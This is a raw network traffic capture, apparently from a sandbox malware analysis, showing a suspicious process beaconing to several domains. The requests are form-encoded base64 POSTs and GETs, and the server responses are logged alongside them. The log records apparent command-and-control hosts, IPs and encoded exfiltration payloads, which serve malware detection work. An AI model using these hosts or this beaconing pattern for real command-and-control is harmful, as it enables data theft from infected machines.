                                                                    Data Ascii: QbUPL=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVUp7WxVIDi1TfqR22BVR6wlVQdc60BHyIywHEWMRsubS6fIF2zRpDJ42in6KJ6e1afdcsLn1JbKPjuO2gpy7zYx104TlmQmrPBGvNMTAEUER8xLOtH9BubHsHkGGhh1DuRhpKbZKigockGibabcV00WdQvBhnWJpzYDyoMU+Zuyaw2QbZwe8OfzNbKixM2I=
                                                                    Timestamp: Jan 11, 2025 08:18:10.669715881 CET | Bytes transferred: 658 | Direction: IN | Data:
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:10 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session ID: 23 | Source IP: 192.168.2.7 | Source Port: 49996 | Destination IP: 203.161.43.228 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:12.615262985 CET | Bytes transferred: 1771 | Direction: OUT | Data:
                                                                    POST /6urf/ HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.connecty.live
                                                                    Referer: http://www.connecty.live/6urf/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 58 4a 37 57 47 39 49 46 46 68 54 65 71 52 32 2f 68 56 51 36 77 6b 48 51 64 55 32 30 42 62 49 49 30 30 48 48 30 30 52 37 76 62 53 74 76 49 46 35 54 52 53 64 35 35 2b 69 6e 71 4f 4a 36 4f 31 61 66 64 63 73 4a 2f 31 5a 2f 65 50 6c 75 4f 33 6e 70 79 2f 33 59 78 4e 30 34 71 59 6d 51 79 56 50 31 36 76 4e 74 6a 41 48 69 34 52 68 42 4c 4d 67 6e 39 4a 75 62 62 6a 48 6c 75 67 68 68 6f 65 75 57 56 70 50 65 73 67 33 52 30 49 78 6b 4f 68 5a 37 55 6c 31 6e 47 53 51 74 64 33 35 48 52 39 2b 35 50 47 6a 36 78 77 4e 61 66 75 67 30 63 76 52 42 79 55 66 4c 75 58 4d 35 4b 30 59 44 4c 51 31 67 58 47 47 4b 50 4c 54 76 41 47 7a 37 6d 37 55 72 54 4b 2b 42 4e 7a 61 79 4f 6e 31 50 4b 69 39 6c 6f 34 34 61 62 70 32 49 49 4d 75 4d 6e 59 70 41 38 70 43 2f 49 39 78 61 6e 6f 4f 53 76 69 49 41 42 34 50 48 4e 58 2f 57 72 74 36 34 4b 72 39 6e 30 6a 6b 4b 57 58 42 33 33 32 37 53 54 63 72 77 78 6d [TRUNCATED]
                                                                    Data Ascii: QbUPL=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 [TRUNCATED]
                                                                    Timestamp: Jan 11, 2025 08:18:13.226315022 CET | Bytes transferred: 658 | Direction: IN | Data:
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:13 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session ID: 24 | Source IP: 192.168.2.7 | Source Port: 49997 | Destination IP: 203.161.43.228 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:15.156759977 CET | Bytes transferred: 481 | Direction: OUT | Data:
                                                                    GET /6urf/?QbUPL=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR7eoy7wVxfJ9K+U+MKKjLOsgjwrfTYLmZqfPCjIDk3pY25vWCr1O4NF+r&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Timestamp: Jan 11, 2025 08:18:15.759304047 CET | Bytes transferred: 673 | Direction: IN | Data:
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:15 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session ID: 25 | Source IP: 192.168.2.7 | Source Port: 49998 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:20.810429096 CET | Bytes transferred: 723 | Direction: OUT | Data:
                                                                    POST /cpgr/ HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.tals.xyz
                                                                    Referer: http://www.tals.xyz/cpgr/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6f 56 72 77 57 45 30 4a 73 45 72 69 38 42 4e 50 76 37 67 48 4e 70 2f 77 6b 65 4c 72 44 56 47 30 4e 4a 74 36 2f 5a 45 4c 49 69 73 57 7a 67 35 76 52 4e 47 57 4f 74 75 4d 6b 64 79 31 51 63 71 39 6f 4c 6f 38 75 46 4b 5a 51 51 6a 31 76 6e 4d 6d 79 57 47 45 52 56 31 6b 52 47 50 39 50 57 2b 49 50 69 56 37 4d 4b 76 53 52 39 43 35 38 45 75 48 4f 69 71 75 64 31 50 4a 74 70 51 49 65 57 2f 63 74 6d 62 71 78 41 71 6d 49 61 4d 58 4b 32 44 75 34 67 31 52 57 78 55 56 51 2f 61 6c 39 66 38 6a 59 42 77 2f 7a 53 2b 6b 5a 43 78 42 74 6c 2f 53 41 64 74 53 58 7a 4f 45 38 51 78 78 4e 69 7a 6c 76 77 70 32 38 41 3d 3d
                                                                    Data Ascii: QbUPL=/Wn5zNWl0nSaoVrwWE0JsEri8BNPv7gHNp/wkeLrDVG0NJt6/ZELIisWzg5vRNGWOtuMkdy1Qcq9oLo8uFKZQQj1vnMmyWGERV1kRGP9PW+IPiV7MKvSR9C58EuHOiqud1PJtpQIeW/ctmbqxAqmIaMXK2Du4g1RWxUVQ/al9f8jYBw/zS+kZCxBtl/SAdtSXzOE8QxxNizlvwp28A==
                                                                    Timestamp: Jan 11, 2025 08:18:21.266819954 CET | Bytes transferred: 73 | Direction: IN | Data:
                                                                    HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID: 26 | Source IP: 192.168.2.7 | Source Port: 49999 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:23.367479086 CET | Bytes transferred: 743 | Direction: OUT | Data:
                                                                    POST /cpgr/ HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.tals.xyz
                                                                    Referer: http://www.tals.xyz/cpgr/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 69 30 4e 73 4a 36 77 39 6f 4c 4a 69 73 57 34 41 35 32 66 74 47 4e 4f 74 69 71 6b 5a 36 31 51 59 43 39 6f 4b 59 38 74 79 65 61 43 51 6a 7a 69 48 4d 6b 74 6d 47 45 52 56 31 6b 52 47 72 62 50 57 57 49 50 53 6c 37 4d 72 76 64 66 64 43 36 31 6b 75 48 4b 69 71 71 64 31 50 4f 74 6f 38 75 65 55 48 63 74 6b 44 71 78 52 71 6e 47 61 4d 64 46 57 43 44 35 44 4d 42 51 6a 63 41 4a 4d 79 4c 33 59 49 54 51 58 78 64 70 77 79 49 48 54 4a 36 70 6e 62 6b 58 37 77 6e 56 79 4b 63 78 79 46 51 53 56 57 50 69 69 49 79 71 35 64 36 36 36 50 4f 78 41 79 75 72 49 61 63 45 37 2b 2b 54 54 34 3d
                                                                    Data Ascii: QbUPL=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmi0NsJ6w9oLJisW4A52ftGNOtiqkZ61QYC9oKY8tyeaCQjziHMktmGERV1kRGrbPWWIPSl7MrvdfdC61kuHKiqqd1POto8ueUHctkDqxRqnGaMdFWCD5DMBQjcAJMyL3YITQXxdpwyIHTJ6pnbkX7wnVyKcxyFQSVWPiiIyq5d666POxAyurIacE7++TT4=
                                                                    Timestamp: Jan 11, 2025 08:18:23.808835983 CET | Bytes transferred: 73 | Direction: IN | Data:
                                                                    HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID: 27 | Source IP: 192.168.2.7 | Source Port: 50000 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:25.913553953 CET | Bytes transferred: 1756 | Direction: OUT | Data:
                                                                    POST /cpgr/ HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.tals.xyz
                                                                    Referer: http://www.tals.xyz/cpgr/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 71 30 4e 36 56 36 78 63 6f 4c 4b 69 73 57 37 41 35 7a 66 74 47 41 4f 73 4b 32 6b 5a 32 6c 51 61 4b 39 36 35 51 38 36 33 69 61 49 51 6a 7a 2b 33 4d 6c 79 57 48 4f 52 57 64 6f 52 47 62 62 50 57 57 49 50 55 4a 37 63 71 76 64 53 39 43 35 38 45 75 62 4f 69 71 43 64 31 58 42 74 6f 49 59 65 6c 6e 63 74 45 54 71 77 6a 53 6e 5a 71 4d 62 47 57 43 62 35 43 78 62 51 6a 41 62 4a 4d 32 68 33 66 6b 54 42 53 41 46 79 53 75 48 53 77 68 47 72 6c 44 33 63 49 4d 53 4d 51 79 42 37 68 34 33 50 58 69 56 6b 45 45 74 72 65 51 51 72 4a 57 34 34 67 57 4f 6b 39 66 55 63 49 4b 41 4f 69 6f 5a 41 32 64 6a 4c 39 38 2f 37 61 53 4e 57 67 6a 52 50 75 79 56 53 52 74 47 47 6e 4a 63 61 53 65 53 43 48 71 59 4b 4c 47 42 2b 72 77 57 73 72 49 4a 45 78 36 6f 67 37 54 37 34 4f 47 6d 76 6f 44 45 6a 72 69 77 37 58 53 73 4f 5a 78 4f 37 46 36 4e 46 31 30 45 44 6a 41 78 79 4c 75 4e 36 2f 63 49 6b 6d 4f 38 [TRUNCATED]
                                                                    Data Ascii: QbUPL= [TRUNCATED]
                                                                    Timestamp: Jan 11, 2025 08:18:26.381391048 CET | Bytes transferred: 73 | Direction: IN | Data: HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID: 28 | Source IP: 192.168.2.7 | Source Port: 50001 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:28.453018904 CET | Bytes transferred: 476 | Direction: OUT | Data: GET /cpgr/?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.tals.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Timestamp: Jan 11, 2025 08:18:28.912782907 CET | Bytes transferred: 399 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                    content-type: text/html
                                                                    date: Sat, 11 Jan 2025 07:18:28 GMT
                                                                    content-length: 278
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 62 55 50 4c 3d 79 55 50 5a 77 34 4f 39 36 6c 4b 52 67 55 44 69 4c 51 34 59 6a 67 57 65 78 30 5a 56 6a 4b 4e 55 56 72 33 48 71 6f 48 72 65 58 65 32 61 36 56 63 37 38 55 32 56 78 6f 58 34 56 55 4f 58 65 32 41 4b 4e 53 58 76 39 6d 73 52 4a 32 71 33 39 59 37 35 6c 7a 6a 45 69 33 67 6e 79 6b 61 75 78 36 7a 65 6e 64 58 62 31 79 62 4c 32 2f 58 55 54 64 45 64 4c 72 51 59 73 6d 33 78 55 57 62 4f 79 66 61 55 6c 2f 43 34 76 4d 47 57 6c 48 4c 26 65 66 34 3d 54 4a 59 58 45 4c 6e 68 46 4a 68 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QbUPL=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjEi3gnykaux6zendXb1ybL2/XUTdEdLrQYsm3xUWbOyfaUl/C4vMGWlHL&ef4=TJYXELnhFJhl"}</script></head></html>


                                                                    Session ID: 29 | Source IP: 192.168.2.7 | Source Port: 50002 | Destination IP: 147.255.21.187 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:34.494033098 CET | Bytes transferred: 729 | Direction: OUT | Data: POST /u9hy/ HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.50food.com
                                                                    Referer: http://www.50food.com/u9hy/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 50 6d 79 50 61 77 69 38 50 4c 75 4b 42 59 31 47 6d 6b 59 39 78 70 2b 30 63 68 64 64 35 68 57 54 56 67 4d 63 55 2f 51 59 45 4a 57 32 70 49 58 34 53 4d 44 2b 4c 45 46 6e 38 79 43 47 67 6a 53 48 52 5a 79 68 34 70 51 5a 43 4c 5a 6c 45 42 72 74 73 41 55 67 48 32 45 72 75 4e 5a 78 6f 61 52 6c 4c 50 77 79 48 54 6a 67 77 32 2f 56 79 62 62 6a 4a 48 42 65 77 43 6f 55 64 55 33 32 47 2f 6b 51 54 51 37 57 53 67 66 36 67 59 4f 64 33 6f 32 67 53 7a 34 67 74 6f 72 57 4f 75 54 6e 38 34 79 64 5a 4a 54 62 6a 62 37 53 6f 30 49 47 4c 34 61 75 58 78 36 54 70 4c 79 61 62 61 52 53 4f 58 4e 57 2b 6a 4d 69 66 51 3d 3d
                                                                    Data Ascii: QbUPL=bo4LrJQp5WjRPmyPawi8PLuKBY1GmkY9xp+0chdd5hWTVgMcU/QYEJW2pIX4SMD+LEFn8yCGgjSHRZyh4pQZCLZlEBrtsAUgH2EruNZxoaRlLPwyHTjgw2/VybbjJHBewCoUdU32G/kQTQ7WSgf6gYOd3o2gSz4gtorWOuTn84ydZJTbjb7So0IGL4auXx6TpLyabaRSOXNW+jMifQ==
                                                                    Timestamp: Jan 11, 2025 08:18:35.081433058 CET | Bytes transferred: 309 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:30 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID: 30 | Source IP: 192.168.2.7 | Source Port: 50003 | Destination IP: 147.255.21.187 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:37.038695097 CET | Bytes transferred: 749 | Direction: OUT | Data: POST /u9hy/ HTTP/1.1
                                                                    Host: www.50food.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.50food.com
                                                                    Referer: http://www.50food.com/u9hy/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 69 54 56 42 38 63 47 72 38 59 42 4a 57 32 6e 6f 57 77 63 73 44 35 4c 45 5a 56 38 7a 2b 47 67 6a 47 48 52 61 6d 68 34 34 51 65 43 62 5a 6e 4d 68 72 72 69 67 55 67 48 32 45 72 75 4e 4d 61 6f 62 31 6c 4b 38 59 79 47 78 4c 6a 73 6d 2f 53 7a 62 62 6a 65 33 42 61 77 43 6f 36 64 56 37 63 47 35 67 51 54 56 2f 57 54 78 66 35 75 59 4f 48 35 49 33 48 55 6d 4e 61 33 62 44 62 44 38 4f 6d 38 71 53 63 59 2f 53 35 35 35 33 2b 32 6c 77 39 50 36 2b 59 41 58 6e 6d 72 4b 32 43 57 34 6c 7a 52 67 6f 38 7a 78 74 6d 4a 74 45 2f 6e 57 79 7a 4b 54 41 4a 73 63 5a 6b 62 42 71 53 32 53 45 3d
                                                                    Data Ascii: QbUPL=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5TiTVB8cGr8YBJW2noWwcsD5LEZV8z+GgjGHRamh44QeCbZnMhrrigUgH2EruNMaob1lK8YyGxLjsm/Szbbje3BawCo6dV7cG5gQTV/WTxf5uYOH5I3HUmNa3bDbD8Om8qScY/S5553+2lw9P6+YAXnmrK2CW4lzRgo8zxtmJtE/nWyzKTAJscZkbBqS2SE=
